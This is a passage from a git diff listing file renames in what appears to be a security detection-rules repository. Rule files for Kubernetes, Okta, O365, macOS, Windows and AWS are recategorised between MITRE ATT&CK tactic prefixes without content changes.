execution_pod_created_with_hostpid.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml => execution_pod_created_with_sensitive_hostpath_volume.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_privileged_pod_created.toml => execution_privileged_pod_created.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml => execution_sensitive_rbac_change_followed_by_workload_modification.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_sensitive_workload_modification_by_user_agent.toml => execution_sensitive_workload_modification_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_suspicious_assignment_of_controller_service_account.toml => execution_suspicious_assignment_of_controller_service_account.toml} (100%) rename rules/integrations/kubernetes/{persistence_exposed_service_created_with_type_nodeport.toml => initial_access_exposed_service_created_with_type_nodeport.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_service_account_rbac_write_operation.toml => persistence_service_account_rbac_write_operation.toml} (100%) rename rules/integrations/kubernetes/{execution_forbidden_creation_request.toml => privilege_escalation_forbidden_creation_request.toml} (100%) rename rules/integrations/lmd/{lateral_movement_ml_high_mean_rdp_process_args.toml => execution_ml_high_mean_rdp_process_args.toml} (100%) rename rules/integrations/lmd/{lateral_movement_ml_spike_in_remote_file_transfers.toml => exfiltration_ml_spike_in_remote_file_transfers.toml} (100%) rename rules/integrations/o365/{exfiltration_exchange_transport_rule_creation.toml => collection_exchange_transport_rule_creation.toml} (100%) rename rules/integrations/o365/{discovery_sharepoint_sensitive_term_search.toml => collection_sharepoint_sensitive_term_search.toml} (100%) rename rules/integrations/o365/{initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml => credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/o365/{initial_access_identity_unusual_sso_errors_for_user.toml => credential_access_identity_unusual_sso_errors_for_user.toml} (100%) rename rules/integrations/o365/{privilege_escalation_exchange_new_or_modified_federation_domain.toml => defense_evasion_exchange_new_or_modified_federation_domain.toml} (100%) rename rules/integrations/o365/{exfiltration_exchange_transport_rule_modification.toml => defense_evasion_exchange_transport_rule_modification.toml} (100%) rename rules/integrations/o365/{initial_access_identity_illicit_consent_grant_via_registered_application.toml => persistence_identity_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/o365/{privilege_escalation_sharepoint_site_collection_admin_added.toml => persistence_sharepoint_site_collection_admin_added.toml} (100%) rename rules/integrations/okta/{persistence_mfa_deactivation_with_no_reactivation.toml => defense_evasion_mfa_deactivation_with_no_reactivation.toml} (100%) rename rules/integrations/okta/{lateral_movement_multiple_sessions_for_single_user.toml => defense_evasion_multiple_sessions_for_single_user.toml} (100%) rename rules/integrations/okta/{credential_access_multiple_user_agent_os_authentication.toml => defense_evasion_multiple_user_agent_os_authentication.toml} (100%) rename rules/integrations/okta/{credential_access_okta_aitm_session_cookie_replay.toml => defense_evasion_okta_aitm_session_cookie_replay.toml} (100%) rename rules/integrations/okta/{impact_okta_attempt_to_deactivate_okta_application.toml => defense_evasion_okta_attempt_to_deactivate_okta_application.toml} (100%) rename rules/integrations/okta/{impact_okta_attempt_to_modify_okta_application.toml => defense_evasion_okta_attempt_to_modify_okta_application.toml} (100%) rename rules/integrations/okta/{persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml => defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml} (100%) rename rules/integrations/okta/{initial_access_sign_in_events_via_third_party_idp.toml => defense_evasion_sign_in_events_via_third_party_idp.toml} (100%) rename rules/integrations/okta/{persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml => defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml} (100%) rename rules/integrations/okta/{initial_access_successful_application_sso_from_unknown_client_device.toml => defense_evasion_successful_application_sso_from_unknown_client_device.toml} (100%) rename rules/integrations/okta/{credential_access_user_impersonation_access.toml => defense_evasion_user_impersonation_access.toml} (100%) rename rules/integrations/okta/{defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml => initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml} (100%) rename rules/macos/{credential_access_high_volume_of_pbpaste.toml => collection_high_volume_of_pbpaste.toml} (100%) rename rules/macos/{defense_evasion_suspicious_tcc_access_granted.toml => collection_suspicious_tcc_access_granted.toml} (100%) rename rules/macos/{persistence_curl_execution_via_shell_profile.toml => command_and_control_curl_execution_via_shell_profile.toml} (100%) rename rules/macos/{execution_installer_package_spawned_network_event.toml => command_and_control_installer_package_spawned_network_event.toml} (100%) rename rules/macos/{execution_scripting_osascript_exec_followed_by_netcon.toml => command_and_control_scripting_osascript_exec_followed_by_netcon.toml} (100%) rename rules/macos/{persistence_account_creation_hide_at_logon.toml => defense_evasion_account_creation_hide_at_logon.toml} (100%) rename rules/macos/{persistence_evasion_hidden_launch_agent_deamon_creation.toml => defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml} (100%) rename rules/macos/{persistence_hidden_plist_filename.toml => defense_evasion_hidden_plist_filename.toml} (100%) rename rules/macos/{discovery_suspicious_sip_check.toml => defense_evasion_suspicious_sip_check.toml} (100%) rename rules/macos/{privilege_escalation_applescript_with_admin_privs.toml => execution_applescript_with_admin_privs.toml} (100%) rename rules/macos/{privilege_escalation_explicit_creds_via_scripting.toml => execution_explicit_creds_via_scripting.toml} (100%) rename rules/macos/{command_and_control_perl_outbound_network_connection.toml => execution_perl_outbound_network_connection.toml} (100%) rename rules/macos/{initial_access_suspicious_mac_ms_office_child_process.toml => execution_suspicious_mac_ms_office_child_process.toml} (100%) rename rules/macos/{lateral_movement_vpn_connection_attempt.toml => initial_access_vpn_connection_attempt.toml} (100%) rename rules/macos/{privilege_escalation_local_user_added_to_admin.toml => persistence_local_user_added_to_admin.toml} (100%) rename rules/macos/{lateral_movement_remote_ssh_login_enabled.toml => persistence_remote_ssh_login_enabled.toml} (100%) rename rules/macos/{privilege_escalation_root_crontab_filemod.toml => persistence_root_crontab_filemod.toml} (100%) rename rules/macos/{privilege_escalation_user_added_to_admin_group.toml => persistence_user_added_to_admin_group.toml} (100%) rename rules/ml/{execution_ml_windows_anomalous_script.toml => defense_evasion_ml_windows_anomalous_script.toml} (100%) rename rules/ml/{persistence_ml_rare_process_by_host_linux.toml => execution_ml_rare_process_by_host_linux.toml} (100%) rename rules/ml/{persistence_ml_windows_anomalous_path_activity.toml => execution_ml_windows_anomalous_path_activity.toml} (100%) rename rules/ml/{persistence_ml_windows_anomalous_process_creation.toml => execution_ml_windows_anomalous_process_creation.toml} (100%) rename rules/network/{initial_access_rpc_remote_procedure_call_to_the_internet.toml => command_and_control_rpc_remote_procedure_call_to_the_internet.toml} (100%) rename rules/network/{initial_access_react_server_components_rce_attempt.toml => execution_react_server_components_rce_attempt.toml} (100%) rename rules/network/{initial_access_smb_windows_file_sharing_activity_to_the_internet.toml => exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml} (100%) rename rules/network/{command_and_control_accepted_default_telnet_port_connection.toml => initial_access_accepted_default_telnet_port_connection.toml} (100%) rename rules/network/{command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml => initial_access_rdp_remote_desktop_protocol_from_the_internet.toml} (100%) rename rules/network/{command_and_control_vnc_virtual_network_computing_from_the_internet.toml => initial_access_vnc_virtual_network_computing_from_the_internet.toml} (100%) rename rules/network/{initial_access_unsecure_elasticsearch_node.toml => reconnaissance_unsecure_elasticsearch_node.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_cred_manipulation_detected.toml => defense_evasion_endgame_cred_manipulation_detected.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_cred_manipulation_prevented.toml => defense_evasion_endgame_cred_manipulation_prevented.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_permission_theft_detected.toml => defense_evasion_endgame_permission_theft_detected.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_permission_theft_prevented.toml => defense_evasion_endgame_permission_theft_prevented.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_process_injection_detected.toml => defense_evasion_endgame_process_injection_detected.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_process_injection_prevented.toml => defense_evasion_endgame_process_injection_prevented.toml} (100%) rename rules/windows/{credential_access_adidns_wildcard.toml => collection_adidns_wildcard.toml} (100%) rename rules/windows/{credential_access_browsers_unusual_parent.toml => collection_browsers_unusual_parent.toml} (100%) rename rules/windows/{credential_access_dnsnode_creation.toml => collection_dnsnode_creation.toml} (100%) rename rules/windows/{credential_access_web_config_file_access.toml => collection_web_config_file_access.toml} (100%) rename rules/windows/{execution_command_prompt_connecting_to_the_internet.toml => command_and_control_command_prompt_connecting_to_the_internet.toml} (100%) rename rules/windows/{defense_evasion_msiexec_remote_payload.toml => command_and_control_msiexec_remote_payload.toml} (100%) rename rules/windows/{execution_revshell_cmd_via_netcat.toml => command_and_control_revshell_cmd_via_netcat.toml} (100%) rename rules/windows/{execution_scripting_remote_webdav.toml => command_and_control_scripting_remote_webdav.toml} (100%) rename rules/windows/{defense_evasion_suspicious_certutil_commands.toml => command_and_control_suspicious_certutil_commands.toml} (100%) rename rules/windows/{defense_evasion_unusual_network_connection_via_dllhost.toml => command_and_control_unusual_network_connection_via_dllhost.toml} (100%) rename rules/windows/{defense_evasion_unusual_network_connection_via_rundll32.toml => command_and_control_unusual_network_connection_via_rundll32.toml} (100%) rename rules/windows/{execution_posh_hacktool_functions.toml => credential_access_posh_hacktool_functions.toml} (100%) rename rules/windows/{exfiltration_smb_rare_destination.toml => credential_access_smb_rare_destination.toml} (100%) rename rules/windows/{lateral_movement_alternate_creds_pth.toml => defense_evasion_alternate_creds_pth.toml} (100%) rename rules/windows/{execution_com_object_xwizard.toml => defense_evasion_com_object_xwizard.toml} (100%) rename rules/windows/{execution_command_shell_via_rundll32.toml => defense_evasion_command_shell_via_rundll32.toml} (100%) rename rules/windows/{privilege_escalation_create_process_as_different_user.toml => defense_evasion_create_process_as_different_user.toml} (100%) rename rules/windows/{privilege_escalation_create_process_with_token_unpriv.toml => defense_evasion_create_process_with_token_unpriv.toml} (100%) rename rules/windows/{lateral_movement_dcom_mmc20.toml => defense_evasion_dcom_mmc20.toml} (100%) rename rules/windows/{execution_delayed_via_ping_lolbas_unsigned.toml => defense_evasion_delayed_via_ping_lolbas_unsigned.toml} (100%) rename rules/windows/{privilege_escalation_disable_uac_registry.toml => defense_evasion_disable_uac_registry.toml} (100%) rename rules/windows/{persistence_evasion_hidden_local_account_creation.toml => defense_evasion_evasion_hidden_local_account_creation.toml} (100%) rename rules/windows/{persistence_evasion_registry_startup_shell_folder_modified.toml => defense_evasion_evasion_registry_startup_shell_folder_modified.toml} (100%) rename rules/windows/{initial_access_evasion_suspicious_htm_file_creation.toml => defense_evasion_evasion_suspicious_htm_file_creation.toml} (100%) rename rules/windows/{privilege_escalation_expired_driver_loaded.toml => defense_evasion_expired_driver_loaded.toml} (100%) rename rules/windows/{initial_access_exploit_jetbrains_teamcity.toml => defense_evasion_exploit_jetbrains_teamcity.toml} (100%) rename rules/windows/{execution_from_unusual_path_cmdline.toml => defense_evasion_from_unusual_path_cmdline.toml} (100%) rename rules/windows/{execution_html_help_executable_program_connecting_to_the_internet.toml => defense_evasion_html_help_executable_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{privilege_escalation_krbrelayup_service_creation.toml => defense_evasion_krbrelayup_service_creation.toml} (100%) rename rules/windows/{privilege_escalation_make_token_local.toml => defense_evasion_make_token_local.toml} (100%) rename rules/windows/{persistence_msi_installer_task_startup.toml => defense_evasion_msi_installer_task_startup.toml} (100%) rename rules/windows/{privilege_escalation_newcreds_logon_rare_process.toml => defense_evasion_newcreds_logon_rare_process.toml} (100%) rename rules/windows/{execution_posh_portable_executable.toml => defense_evasion_posh_portable_executable.toml} (100%) rename rules/windows/{privilege_escalation_posh_token_impersonation.toml => defense_evasion_posh_token_impersonation.toml} (100%) rename rules/windows/{initial_access_potential_webhelpdesk_exploit.toml => defense_evasion_potential_webhelpdesk_exploit.toml} (100%) rename rules/windows/{privilege_escalation_printspooler_suspicious_file_deletion.toml => defense_evasion_printspooler_suspicious_file_deletion.toml} (100%) rename rules/windows/{lateral_movement_rdp_enabled_registry.toml => defense_evasion_rdp_enabled_registry.toml} (100%) rename rules/windows/{execution_register_server_program_connecting_to_the_internet.toml => defense_evasion_register_server_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{persistence_sdprop_exclusion_dsheuristics.toml => defense_evasion_sdprop_exclusion_dsheuristics.toml} (100%) rename rules/windows/{persistence_services_registry.toml => defense_evasion_services_registry.toml} (100%) rename rules/windows/{initial_access_suspicious_execution_from_vscode_extension.toml => defense_evasion_suspicious_execution_from_vscode_extension.toml} (100%) rename rules/windows/{initial_access_suspicious_ms_office_child_process.toml => defense_evasion_suspicious_ms_office_child_process.toml} (100%) rename rules/windows/{execution_suspicious_psexesvc.toml => defense_evasion_suspicious_psexesvc.toml} (100%) rename rules/windows/{initial_access_suspicious_windows_server_update_svc.toml => defense_evasion_suspicious_windows_server_update_svc.toml} (100%) rename rules/windows/{privilege_escalation_tokenmanip_sedebugpriv_enabled.toml => defense_evasion_tokenmanip_sedebugpriv_enabled.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_com_clipup.toml => defense_evasion_uac_bypass_com_clipup.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_com_ieinstal.toml => defense_evasion_uac_bypass_com_ieinstal.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_com_interface_icmluautil.toml => defense_evasion_uac_bypass_com_interface_icmluautil.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_diskcleanup_hijack.toml => defense_evasion_uac_bypass_diskcleanup_hijack.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_dll_sideloading.toml => defense_evasion_uac_bypass_dll_sideloading.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_event_viewer.toml => defense_evasion_uac_bypass_event_viewer.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_mock_windir.toml => defense_evasion_uac_bypass_mock_windir.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_winfw_mmc_hijack.toml => defense_evasion_uac_bypass_winfw_mmc_hijack.toml} (100%) rename rules/windows/{privilege_escalation_unusual_parentchild_relationship.toml => defense_evasion_unusual_parentchild_relationship.toml} (100%) rename rules/windows/{privilege_escalation_unusual_svchost_childproc_childless.toml => defense_evasion_unusual_svchost_childproc_childless.toml} (100%) rename rules/windows/{initial_access_url_cve_2025_33053.toml => defense_evasion_url_cve_2025_33053.toml} (100%) rename rules/windows/{persistence_via_bits_job_notify_command.toml => defense_evasion_via_bits_job_notify_command.toml} (100%) rename rules/windows/{execution_via_compiled_html_file.toml => defense_evasion_via_compiled_html_file.toml} (100%) rename rules/windows/{persistence_via_hidden_run_key_valuename.toml => defense_evasion_via_hidden_run_key_valuename.toml} (100%) rename rules/windows/{execution_via_hidden_shell_conhost.toml => defense_evasion_via_hidden_shell_conhost.toml} (100%) rename rules/windows/{execution_via_mmc_console_file_unusual_path.toml => defense_evasion_via_mmc_console_file_unusual_path.toml} (100%) rename rules/windows/{privilege_escalation_via_token_theft.toml => defense_evasion_via_token_theft.toml} (100%) rename rules/windows/{execution_windows_cmd_shell_susp_args.toml => defense_evasion_windows_cmd_shell_susp_args.toml} (100%) rename rules/windows/{execution_windows_fakecaptcha_cmd_ps.toml => defense_evasion_windows_fakecaptcha_cmd_ps.toml} (100%) rename rules/windows/{execution_windows_powershell_susp_args.toml => defense_evasion_windows_powershell_susp_args.toml} (100%) rename rules/windows/{execution_windows_script_from_internet.toml => defense_evasion_windows_script_from_internet.toml} (100%) rename rules/windows/{initial_access_xsl_script_execution_via_com.toml => defense_evasion_xsl_script_execution_via_com.toml} (100%) rename rules/windows/{execution_enumeration_via_wmiprvse.toml => discovery_enumeration_via_wmiprvse.toml} (100%) rename rules/windows/{lateral_movement_cmd_service.toml => execution_cmd_service.toml} (100%) rename rules/windows/{lateral_movement_dcom_shellwindow_shellbrowserwindow.toml => execution_dcom_shellwindow_shellbrowserwindow.toml} (100%) rename rules/windows/{privilege_escalation_group_policy_scheduled_task.toml => execution_group_policy_scheduled_task.toml} (100%) rename rules/windows/{lateral_movement_incoming_wmi.toml => execution_incoming_wmi.toml} (100%) rename rules/windows/{initial_access_rdp_file_mail_attachment.toml => execution_rdp_file_mail_attachment.toml} (100%) rename rules/windows/{lateral_movement_remote_services.toml => execution_remote_services.toml} (100%) rename rules/windows/{lateral_movement_remote_task_creation_winlog.toml => execution_remote_task_creation_winlog.toml} (100%) rename rules/windows/{lateral_movement_scheduled_task_target.toml => execution_scheduled_task_target.toml} (100%) rename rules/windows/{initial_access_script_executing_powershell.toml => execution_script_executing_powershell.toml} (100%) rename rules/windows/{initial_access_scripts_process_started_via_wmi.toml => execution_scripts_process_started_via_wmi.toml} (100%) rename rules/windows/{privilege_escalation_service_control_spawned_script_int.toml => execution_service_control_spawned_script_int.toml} (100%) rename rules/windows/{initial_access_suspicious_ms_exchange_worker_child_process.toml => execution_suspicious_ms_exchange_worker_child_process.toml} (100%) rename rules/windows/{initial_access_suspicious_ms_outlook_child_process.toml => execution_suspicious_ms_outlook_child_process.toml} (100%) rename rules/windows/{defense_evasion_suspicious_process_access_direct_syscall.toml => execution_suspicious_process_access_direct_syscall.toml} (100%) rename rules/windows/{persistence_suspicious_scheduled_task_runtime.toml => execution_suspicious_scheduled_task_runtime.toml} (100%) rename rules/windows/{defense_evasion_suspicious_zoom_child_process.toml => execution_suspicious_zoom_child_process.toml} (100%) rename rules/windows/{persistence_system_shells_via_services.toml => execution_system_shells_via_services.toml} (100%) rename rules/windows/{persistence_temp_scheduled_task.toml => execution_temp_scheduled_task.toml} (100%) rename rules/windows/{initial_access_via_explorer_suspicious_child_parent_args.toml => execution_via_explorer_suspicious_child_parent_args.toml} (100%) rename rules/windows/{persistence_via_wmi_stdregprov_run_services.toml => execution_via_wmi_stdregprov_run_services.toml} (100%) rename rules/windows/{lateral_movement_via_wsus_update.toml => execution_via_wsus_update.toml} (100%) rename rules/windows/{persistence_via_xp_cmdshell_mssql_stored_procedure.toml => execution_via_xp_cmdshell_mssql_stored_procedure.toml} (100%) rename rules/windows/{impact_volume_shadow_copy_deletion_via_powershell.toml => execution_volume_shadow_copy_deletion_via_powershell.toml} (100%) rename rules/windows/{impact_volume_shadow_copy_deletion_via_wmic.toml => execution_volume_shadow_copy_deletion_via_wmic.toml} (100%) rename rules/windows/{persistence_webshell_detection.toml => execution_webshell_detection.toml} (100%) rename rules/windows/{initial_access_webshell_screenconnect_server.toml => execution_webshell_screenconnect_server.toml} (100%) rename rules/windows/{defense_evasion_wsl_bash_exec.toml => execution_wsl_bash_exec.toml} (100%) rename rules/windows/{privilege_escalation_account_takeover_mixed_logon_types.toml => initial_access_account_takeover_mixed_logon_types.toml} (100%) rename rules/windows/{execution_downloaded_shortcut_files.toml => initial_access_downloaded_shortcut_files.toml} (100%) rename rules/windows/{execution_downloaded_url_file.toml => initial_access_downloaded_url_file.toml} (100%) rename rules/windows/{privilege_escalation_takeover_new_source_ip.toml => initial_access_takeover_new_source_ip.toml} (100%) rename rules/windows/{lateral_movement_unusual_dns_service_children.toml => initial_access_unusual_dns_service_children.toml} (100%) rename rules/windows/{lateral_movement_unusual_dns_service_file_writes.toml => initial_access_unusual_dns_service_file_writes.toml} (100%) rename rules/windows/{privilege_escalation_badsuccessor_dmsa_abuse.toml => persistence_badsuccessor_dmsa_abuse.toml} (100%) rename rules/windows/{privilege_escalation_credroaming_ldap.toml => persistence_credroaming_ldap.toml} (100%) rename rules/windows/{credential_access_dcsync_user_backdoor.toml => persistence_dcsync_user_backdoor.toml} (100%) rename rules/windows/{privilege_escalation_dmsa_creation_by_unusual_user.toml => persistence_dmsa_creation_by_unusual_user.toml} (100%) rename rules/windows/{privilege_escalation_dns_serverlevelplugindll.toml => persistence_dns_serverlevelplugindll.toml} (100%) rename rules/windows/{privilege_escalation_gpo_schtask_service_creation.toml => persistence_gpo_schtask_service_creation.toml} (100%) rename rules/windows/{privilege_escalation_group_policy_iniscript.toml => persistence_group_policy_iniscript.toml} (100%) rename rules/windows/{privilege_escalation_lsa_auth_package.toml => persistence_lsa_auth_package.toml} (100%) rename rules/windows/{credential_access_lsass_loaded_susp_dll.toml => persistence_lsass_loaded_susp_dll.toml} (100%) rename rules/windows/{defense_evasion_masquerading_suspicious_werfault_childproc.toml => persistence_masquerading_suspicious_werfault_childproc.toml} (100%) rename rules/windows/{command_and_control_outlook_home_page.toml => persistence_outlook_home_page.toml} (100%) rename rules/windows/{privilege_escalation_port_monitor_print_processor_abuse.toml => persistence_port_monitor_print_processor_abuse.toml} (100%) rename rules/windows/{privilege_escalation_reg_service_imagepath_mod.toml => persistence_reg_service_imagepath_mod.toml} (100%) rename rules/windows/{defense_evasion_regmod_remotemonologue.toml => persistence_regmod_remotemonologue.toml} (100%) rename rules/windows/{defense_evasion_scheduledjobs_at_protocol_enabled.toml => persistence_scheduledjobs_at_protocol_enabled.toml} (100%) rename rules/windows/{credential_access_seenabledelegationprivilege_assigned_to_user.toml => persistence_seenabledelegationprivilege_assigned_to_user.toml} (100%) rename rules/windows/{credential_access_shadow_credentials.toml => persistence_shadow_credentials.toml} (100%) rename rules/windows/{execution_shared_modules_local_sxs_dll.toml => persistence_shared_modules_local_sxs_dll.toml} (100%) rename rules/windows/{credential_access_spn_attribute_modified.toml => persistence_spn_attribute_modified.toml} (100%) rename rules/windows/{privilege_escalation_windows_service_via_unusual_client.toml => persistence_windows_service_via_unusual_client.toml} (100%) rename rules_building_block/{execution_github_new_repo_interaction_for_pat.toml => collection_github_new_repo_interaction_for_pat.toml} (100%) rename rules_building_block/{execution_github_new_repo_interaction_for_user.toml => collection_github_new_repo_interaction_for_user.toml} (100%) rename rules_building_block/{execution_github_repo_interaction_from_new_ip.toml => collection_github_repo_interaction_from_new_ip.toml} (100%) rename rules_building_block/{discovery_capnetraw_capability.toml => credential_access_capnetraw_capability.toml} (100%) rename rules_building_block/{initial_access_okta_admin_console_login_failure.toml => credential_access_okta_admin_console_login_failure.toml} (100%) rename rules_building_block/{command_and_control_bitsadmin_activity.toml => defense_evasion_bitsadmin_activity.toml} (100%) rename rules_building_block/{initial_access_github_new_ip_address_for_pat.toml => defense_evasion_github_new_ip_address_for_pat.toml} (100%) rename rules_building_block/{persistence_github_new_pat_for_user.toml => defense_evasion_github_new_pat_for_user.toml} (100%) rename rules_building_block/{discovery_linux_sysctl_enumeration.toml => defense_evasion_linux_sysctl_enumeration.toml} (100%) rename rules_building_block/{credential_access_mdmp_file_unusual_extension.toml => defense_evasion_mdmp_file_unusual_extension.toml} (100%) rename rules_building_block/{execution_settingcontent_ms_file_creation.toml => defense_evasion_settingcontent_ms_file_creation.toml} (100%) rename rules_building_block/{privilege_escalation_sts_getsessiontoken_abuse.toml => defense_evasion_sts_getsessiontoken_abuse.toml} (100%) rename rules_building_block/{initial_access_anomalous_rsc_flight_data_patterns.toml => execution_anomalous_rsc_flight_data_patterns.toml} (100%) rename rules_building_block/{lateral_movement_at.toml => execution_at.toml} (100%) rename rules_building_block/{defense_evasion_download_susp_extension.toml => execution_download_susp_extension.toml} (100%) rename rules_building_block/{defense_evasion_injection_from_msoffice.toml => execution_injection_from_msoffice.toml} (100%) rename rules_building_block/{defense_evasion_outlook_suspicious_child.toml => execution_outlook_suspicious_child.toml} (100%) rename rules_building_block/{lateral_movement_posh_winrm_activity.toml => execution_posh_winrm_activity.toml} (100%) rename rules_building_block/{lateral_movement_unusual_process_sql_accounts.toml => execution_unusual_process_sql_accounts.toml} (100%) rename rules_building_block/{lateral_movement_wmic_remote.toml => execution_wmic_remote.toml} (100%) rename rules_building_block/{credential_access_entra_id_risk_detection_signal.toml => initial_access_entra_id_risk_detection_signal.toml} (100%) rename rules_building_block/{persistence_web_server_potential_sql_injection.toml => initial_access_web_server_potential_sql_injection.toml} (100%) rename rules_building_block/{execution_github_new_event_action_for_pat.toml => persistence_github_new_event_action_for_pat.toml} (100%) rename rules_building_block/{discovery_linux_modprobe_enumeration.toml => persistence_linux_modprobe_enumeration.toml} (100%) rename rules_building_block/{defense_evasion_service_path_registry.toml => persistence_service_path_registry.toml} (100%) rename rules_building_block/{defense_evasion_services_exe_path.toml => persistence_services_exe_path.toml} (100%) rename rules_building_block/{defense_evasion_write_dac_access.toml => persistence_write_dac_access.toml} (100%) rename rules_building_block/{execution_github_repo_created.toml => resource_development_github_repo_created.toml} (100%) diff --git a/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml b/rules/cross-platform/collection_azure_o365_with_network_alert.toml similarity index 100% rename from rules/cross-platform/initial_access_azure_o365_with_network_alert.toml rename to rules/cross-platform/collection_azure_o365_with_network_alert.toml diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml similarity index 100% rename from rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml rename to rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml similarity index 100% rename from rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml rename to rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/initial_access_web_server_potential_command_injection.toml similarity index 100% rename from rules/cross-platform/persistence_web_server_potential_command_injection.toml rename to rules/cross-platform/initial_access_web_server_potential_command_injection.toml diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/persistence_genai_config_modification.toml similarity index 100% rename from rules/cross-platform/defense_evasion_genai_config_modification.toml rename to rules/cross-platform/persistence_genai_config_modification.toml diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/persistence_trap_execution.toml similarity index 100% rename from rules/cross-platform/privilege_escalation_trap_execution.toml rename to rules/cross-platform/persistence_trap_execution.toml diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/resource_development_genai_process_compiling_executables.toml similarity index 100% rename from rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml rename to rules/cross-platform/resource_development_genai_process_compiling_executables.toml diff --git a/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml similarity index 100% rename from rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml rename to rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/collection_rds_instance_restored.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_rds_instance_restored.toml rename to rules/integrations/aws/collection_rds_instance_restored.toml diff --git a/rules/integrations/aws/exfiltration_rds_snapshot_export.toml b/rules/integrations/aws/collection_rds_snapshot_export.toml similarity index 100% rename from rules/integrations/aws/exfiltration_rds_snapshot_export.toml rename to rules/integrations/aws/collection_rds_snapshot_export.toml diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml similarity index 100% rename from rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml rename to rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml similarity index 100% rename from rules/integrations/aws/collection_cloudtrail_logging_created.toml rename to rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml similarity index 100% rename from rules/integrations/aws/impact_cloudtrail_logging_updated.toml rename to rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml similarity index 100% rename from rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml rename to rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml similarity index 100% rename from rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml rename to rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml similarity index 100% rename from rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml rename to rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml similarity index 100% rename from rules/integrations/aws/persistence_ec2_network_acl_creation.toml rename to rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml similarity index 100% rename from rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml rename to rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml diff --git 